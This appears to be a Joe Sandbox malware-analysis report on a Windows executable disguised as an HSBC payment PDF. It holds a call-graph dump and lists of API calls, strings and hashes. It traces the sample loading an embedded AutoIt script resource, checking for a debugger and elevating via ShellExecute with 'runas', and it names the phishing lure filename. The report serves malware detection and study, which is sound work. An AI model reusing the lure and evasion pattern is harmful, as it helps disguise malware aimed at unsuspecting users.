183842 468723 183841->183842 183843 46871e 183841->183843 183842->183791 184028 4677b3 183843->184028 183846 47cadd 130 API calls 183845->183846 183847 47df33 183846->183847 183847->183791 183849 409a98 59 API calls 183848->183849 183850 411fdb 183849->183850 183851 446585 183850->183851 183853 420db6 Mailbox 59 API calls 183850->183853 183855 412029 183851->183855 184075 46f574 59 API calls 183851->184075 183854 411ff4 183853->183854 183857 412004 183854->183857 184072 4057a6 60 API calls Mailbox 183854->184072 183860 409b3c 59 API calls 183855->183860 183864 412036 183855->183864 183858 409837 84 API calls 183857->183858 183859 412012 183858->183859 183862 4057f6 67 API calls 183859->183862 183861 4465cd 183860->183861 183863 4465d5 183861->183863 183861->183864 183865 412021 183862->183865 183866 409b3c 59 API calls 183863->183866 183867 405cdf 2 API calls 183864->183867 183865->183851 183865->183855 184074 4058ba CloseHandle 183865->184074 183869 41203d 183866->183869 183867->183869 183870 4465e7 183869->183870 183871 412057 183869->183871 183873 420db6 Mailbox 59 API calls 183870->183873 183872 407667 59 API calls 183871->183872 183874 41205f 183872->183874 183876 4465ed 183873->183876 184051 405572 183874->184051 183877 446601 183876->183877 184076 405850 ReadFile SetFilePointerEx 183876->184076 183882 446605 _memmove 183877->183882 184077 4676c4 59 API calls 2 library calls 183877->184077 183878 41206e 183878->183882 184066 409a3c 183878->184066 183883 412082 Mailbox 183884 4120bc 183883->183884 183885 405c6f CloseHandle 183883->183885 183884->183791 183886 4120b0 183885->183886 183886->183884 184073 4058ba CloseHandle 183886->184073 183889 407667 59 API calls 183888->183889 183890 482158 183889->183890 183891 409837 84 API calls 183890->183891 183892 482167 183891->183892 183893 407a16 59 API calls 183892->183893 183894 48217a 183893->183894 183895 409837 84 API calls 183894->183895 183896 482187 183895->183896 183897 4821a1 183896->183897 183898 482215 183896->183898 183899 409b3c 59 API calls 183897->183899 183900 409837 84 API calls 183898->183900 183901 4821a6 183899->183901 183902 48221a 183900->183902 183903 482204 183901->183903 183908 4821bd 183901->183908 183904 482228 183902->183904 183905 482246 183902->183905 183907 409a98 59 API calls 183903->183907 183909 409a98 59 API calls 183904->183909 183906 48225b 183905->183906 183910 409b3c 59 API calls 183905->183910 183911 482270 183906->183911 183913 409b3c 59 API calls 183906->183913 183923 482211 Mailbox 183907->183923 183912 40784b 59 API calls 183908->183912 183909->183923 183910->183906 183914 407f77 59 API calls 183911->183914 183915 4821ca 183912->183915 183913->183911 183916 48228a 183914->183916 183917 407b2e 59 API calls 183915->183917 184081 45f401 62 API calls Mailbox 183916->184081 183918 4821d8 183917->183918 183920 40784b 59 API calls 183918->183920 183921 4821f1 183920->183921 183922 407b2e 59 API calls 183921->183922 183925 4821ff 183922->183925 183923->183791 183924 409a3c 59 API calls 183924->183923 183925->183924 183927 46d09a 183926->183927 183928 46d0a5 183926->183928 183929 409b3c 59 API calls 183927->183929 183931 407667 59 API calls 183928->183931 183971 46d17f Mailbox 183928->183971 183929->183928 183930 420db6 Mailbox 59 API calls 183932 46d1c8 183930->183932 183933 46d0c9 183931->183933 183934 46d1d4 183932->183934 184083 4057a6 60 API calls Mailbox 183932->184083 183936 407667 59 API calls 183933->183936 183937 409837 84 API calls 183934->183937 183938 46d0d2 183936->183938 183939 46d1ec 183937->183939 183940 409837 84 API calls 183938->183940 183941 4057f6 67 API calls 183939->183941 183942 46d0de 183940->183942 183943 46d1fb 183941->183943 183944 40459b 59 API calls 183942->183944 183945 46d1ff GetLastError 183943->183945 183953 46d233 183943->183953 183946 46d0f3 183944->183946 183950 46d218 183945->183950 183947 407b2e 59 API calls 183946->183947 183951 46d126 183947->183951 183948 46d295 183952 420db6 Mailbox 59 API calls 183948->183952 183949 46d25e 183954 420db6 Mailbox 59 API calls 183949->183954 183969 46d188 Mailbox 183950->183969 184084 4058ba CloseHandle 183950->184084 183955 46d178 183951->183955 183960 463c37 3 API calls 183951->183960 183956 46d29a 183952->183956 183953->183948 183953->183949 183957 46d263 183954->183957 183959 409b3c 59 API calls 183955->183959 183964 407667 59 API calls 183956->183964 183956->183969 183961 46d274 183957->183961 183965 407667 59 API calls 183957->183965 183959->183971 183962 46d136 183960->183962 184085 47fbce 59 API calls 2 library calls 183961->184085 183962->183955 183963 46d13a 183962->183963 183966 407de1 59 API calls 183963->183966 183964->183969 183965->183961 183968 46d147 183966->183968 184082 463a2a 63 API calls Mailbox 183968->184082 183969->183791 183971->183930 183971->183969 183972 46d150 Mailbox 183972->183955 183974 407667 59 API calls 183973->183974 183975 47c2f4 183974->183975 183976 407667 59 API calls 183975->183976 183977 47c2fc 183976->183977 183978 407667 59 API calls 183977->183978 183979 47c304 183978->183979 183980 409837 84 API calls 183979->183980 183993 47c312 183980->183993 183981 407924 59 API calls 183981->183993 183982 407bcc 59 API calls 183982->183993 183983 47c4fb 183984 47c528 Mailbox 183983->183984 183986 409a3c 59 API calls 183983->183986 183984->183791 183985 47c4e2 183989 407cab 59 API calls 183985->183989 183986->183984 183987 47c4fd 183990 407cab 59 API calls 183987->183990 183988 408047 59 API calls 183988->183993 183991 47c4ef 183989->183991 183992 47c50c 183990->183992 183995 407b2e 59 API calls 183991->183995 183996 407b2e 59 API calls 183992->183996 183993->183981 183993->183982 183993->183983 183993->183984 183993->183985 183993->183987 183993->183988 183994 407e4f 59 API calls 183993->183994 183997 407e4f 59 API calls 183993->183997 184002 407cab 59 API calls 183993->184002 184003 409837 84 API calls 183993->184003 184004 407b2e 59 API calls 183993->184004 183998 47c3a9 CharUpperBuffW 183994->183998 183995->183983 183996->183983 183999 47c469 CharUpperBuffW 183997->183999 184086 40843a 68 API calls 183998->184086 184087 40c5a7 69 API calls 2 library calls 183999->184087 184002->183993 184003->183993 184004->183993 184006 467962 184005->184006 184007 420db6 Mailbox 59 API calls 184006->184007 184008 467970 184007->184008 184009 407667 59 API calls 184008->184009 184010 46797e 184008->184010 184009->184010 184010->183791 184088 4560c0 184011->184088 184013 45618c 184013->183791 184014->183808 184015->183808 184016->183791 184017->183832 184018->183821 184019->183794 184020->183791 184021->183804 184022->183828 184023->183828 184024->183828 184025->183805 184026->183797 184027->183805 184029 4677ca 184028->184029 184045 4678ea 184028->184045 184030 46780a 184029->184030 184031 4677e2 184029->184031 184033 467821 184029->184033 184032 420db6 Mailbox 59 API calls 184030->184032 184031->184030 184034 4677f2 184031->184034 184040 467800 Mailbox _memmove 184032->184040 184035 420db6 Mailbox 59 API calls 184033->184035 184047 46783e 184033->184047 184043 420db6 Mailbox 59 API calls 184034->184043 184035->184047 184036 467877 184039 420db6 Mailbox 59 API calls 184036->184039 184037 467869 184038 420db6 Mailbox 59 API calls 184037->184038 184038->184040 184041 46787d 184039->184041 184042 420db6 Mailbox 59 API calls 184040->184042 184049 46746b 59 API calls Mailbox 184041->184049 184042->184045 184043->184040 184045->183842 184046 467889 184050 405a15 61 API calls Mailbox 184046->184050 184047->184036 184047->184037 184047->184040 184049->184046 184050->184040 184052 4055a2 184051->184052 184053 40557d 184051->184053 184054 407d8c 59 API calls 184052->184054 184053->184052 184057 40558c 184053->184057 184058 46325e 184054->184058 184055 46328d 184055->183878 184059 405ab8 59 API calls 184057->184059 184058->184055 184078 4631fa ReadFile SetFilePointerEx 184058->184078 184079 407924 59 API calls 2 library calls 184058->184079 184061 46337e 184059->184061 184062 4054d2 61 API calls 184061->184062 184063 46338c 184062->184063 184065 46339c Mailbox 184063->184065 184080 4077da 61 API calls Mailbox 184063->184080 184065->183878 184067 409a87 184066->184067 184069 409a48 184066->184069 184068 408047 59 API calls 184067->184068 184071 409a5b 184068->184071 184070 420db6 Mailbox 59 API calls 184069->184070 184070->184071 184071->183883 184072->183857 184073->183884 184074->183851 184075->183851 184076->183877 184077->183882 184078->184058 184079->184058 184080->184065 184081->183925 184082->183972 184083->183934 184084->183969 184085->183969 184086->183993 184087->183993 184089 4560e8 184088->184089 184090 4560cb 184088->184090 184089->184013 184090->184089 184092 4560ab 59 API calls Mailbox 184090->184092 184092->184090

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 02F18140 Relevance: 62.4, APIs: 32, Strings: 2, Instructions: 2917COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,02F15563), ref: 02F181EB
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,02F15563), ref: 02F18227
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,02F15563), ref: 02F1826F
                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,?,?,?,?,02F15563), ref: 02F18280
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,02F15563), ref: 02F1828E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
                                                                                                                                                    • String ID: $j@h
                                                                                                                                                    • API String ID: 2078281146-3739420905
                                                                                                                                                    • Opcode ID: 17837a5d2175a558fc134f7162f2adb9c8bbb5706557b97ba6e0f204a16f8628
                                                                                                                                                    • Instruction ID: 98658d9d965373a03bca0160adf6bcb765380bac14f61200016134cefb2d6887
                                                                                                                                                    • Opcode Fuzzy Hash: 17837a5d2175a558fc134f7162f2adb9c8bbb5706557b97ba6e0f204a16f8628
                                                                                                                                                    • Instruction Fuzzy Hash: 6E233A71E0C3809FEB378B28C854776BBA46F913E8F8C4599EB8687292D375D904C752
                                                                                                                                                    Function 00403B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                      • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                                                                                                                                                      • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                                                                                      • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                                                                                      • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                                                                                                                                                      • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                                                                                      • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                                                                                      • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                                                                                      • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                                                                                                                                                      • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                                                                                      • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                                                                                      • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                                                                                      • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                                                                                      • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                                                                                                                                                      • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                                                                                                                                    • API String ID: 529118366-2806069697
                                                                                                                                                    • Opcode ID: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
                                                                                                                                                    • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                                                                                                                                                    • Opcode Fuzzy Hash: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
                                                                                                                                                    • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D
                                                                                                                                                    Function 004049A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 4153 4049a0-404a00 call 407667 GetVersionExW call 407bcc 4158 404a06 4153->4158 4159 404b0b-404b0d 4153->4159 4160 404a09-404a0e 4158->4160 4161 43d767-43d773 4159->4161 4163 404b12-404b13 4160->4163 4164 404a14 4160->4164 4162 43d774-43d778 4161->4162 4165 43d77b-43d787 4162->4165 4166 43d77a 4162->4166 4167 404a15-404a4c call 407d2c call 407726 4163->4167 4164->4167 4165->4162 4168 43d789-43d78e 4165->4168 4166->4165 4176 404a52-404a53 4167->4176 4177 43d864-43d867 4167->4177 4168->4160 4170 43d794-43d79b 4168->4170 4170->4161 4172 43d79d 4170->4172 4175 43d7a2-43d7a5 4172->4175 4178 404a93-404aaa GetCurrentProcess IsWow64Process 4175->4178 4179 43d7ab-43d7c9 4175->4179 4176->4175 4180 404a59-404a64 4176->4180 4181 43d880-43d884 4177->4181 4182 43d869 4177->4182 4183 404aac 4178->4183 4184 404aaf-404ac0 4178->4184 4179->4178 4185 43d7cf-43d7d5 4179->4185 4186 43d7ea-43d7f0 4180->4186 4187 404a6a-404a6c 4180->4187 4189 43d886-43d88f 4181->4189 4190 43d86f-43d878 4181->4190 4188 43d86c 4182->4188 4183->4184 4192 404ac2-404ad2 call 404b37 4184->4192 4193 404b2b-404b35 GetSystemInfo 4184->4193 4194 43d7d7-43d7da 4185->4194 4195 43d7df-43d7e5 4185->4195 4198 43d7f2-43d7f5 4186->4198 4199 43d7fa-43d800 4186->4199 4196 404a72-404a75 4187->4196 4197 43d805-43d811 4187->4197 4188->4190 4189->4188 4191 43d891-43d894 4189->4191 4190->4181 4191->4190 4210 404ad4-404ae1 call 404b37 4192->4210 4211 404b1f-404b29 GetSystemInfo 4192->4211 4200 404af8-404b08 4193->4200 4194->4178 4195->4178 4204 43d831-43d834 4196->4204 4205 404a7b-404a8a 4196->4205 4201 43d813-43d816 4197->4201 4202 43d81b-43d821 4197->4202 4198->4178 4199->4178 4201->4178 4202->4178 4204->4178 4207 43d83a-43d84f 4204->4207 4208 404a90 4205->4208 4209 43d826-43d82c 4205->4209 4212 43d851-43d854 4207->4212 4213 43d859-43d85f 4207->4213 4208->4178 4209->4178 4218 404ae3-404ae7 GetNativeSystemInfo 4210->4218 4219 404b18-404b1d 4210->4219 4214 404ae9-404aed 4211->4214 4212->4178 4213->4178 4214->4200 4217 404aef-404af2 FreeLibrary 4214->4217 4217->4200 4218->4214 4219->4218
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 004049CD
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                                                                                                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                                                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                                                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1986165174-0
                                                                                                                                                    • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                                                                                                    • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                                                                                                                                                    • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                                                                                                    • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E
                                                                                                                                                    Function 00404E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 4220 404e89-404ea1 CreateStreamOnHGlobal 4221 404ec1-404ec6 4220->4221 4222 404ea3-404eba FindResourceExW 4220->4222 4223 43d933-43d942 LoadResource 4222->4223 4224 404ec0 4222->4224 4223->4224 4225 43d948-43d956 SizeofResource 4223->4225 4224->4221 4225->4224 4226 43d95c-43d967 LockResource 4225->4226 4226->4224 4227 43d96d-43d975 4226->4227 4228 43d979-43d98b 4227->4228 4228->4224
                                                                                                                                                    APIs
                                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                                                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                                                                                                                                                    • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                    • String ID: SCRIPT
                                                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                                                    • Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                                                                                                    • Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
                                                                                                                                                    • Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
                                                                                                                                                    • Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665
                                                                                                                                                    Function 0040FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                                    • String ID: pbL$%I
                                                                                                                                                    • API String ID: 3964851224-1578263234
                                                                                                                                                    • Opcode ID: 9eb65fa8a7af425cda676adb71ece23590fc9d3520494d347d6b2d1cf8502869
                                                                                                                                                    • Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
                                                                                                                                                    • Opcode Fuzzy Hash: 9eb65fa8a7af425cda676adb71ece23590fc9d3520494d347d6b2d1cf8502869
                                                                                                                                                    • Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A
                                                                                                                                                    Function 0040E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                                                                                                                                                    • API String ID: 0-2838938394
                                                                                                                                                    • Opcode ID: 0f8e83fbc344d2eea3dc03722d5e703962e6ffe245d6c47f3d1b0fc73dbda5c4
                                                                                                                                                    • Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
                                                                                                                                                    • Opcode Fuzzy Hash: 0f8e83fbc344d2eea3dc03722d5e703962e6ffe245d6c47f3d1b0fc73dbda5c4
                                                                                                                                                    • Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99
                                                                                                                                                    Function 02F162E0 Relevance: 5.3, APIs: 3, Instructions: 791COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 85250a4550e27e67c4628359907dfa5003f19633b0fa60b2956b71905306d3aa
                                                                                                                                                    • Instruction ID: 1668e92a44e0ae3390d3c50be97932782c49a7782e21aeb66afb3d3f9b577d7a
                                                                                                                                                    • Opcode Fuzzy Hash: 85250a4550e27e67c4628359907dfa5003f19633b0fa60b2956b71905306d3aa
                                                                                                                                                    • Instruction Fuzzy Hash: F6325B72E0C3508FEF398E188854B357B6CABC26E8FCD41DAD796CB1A6D3259844C752
                                                                                                                                                    Function 0046445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046448B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
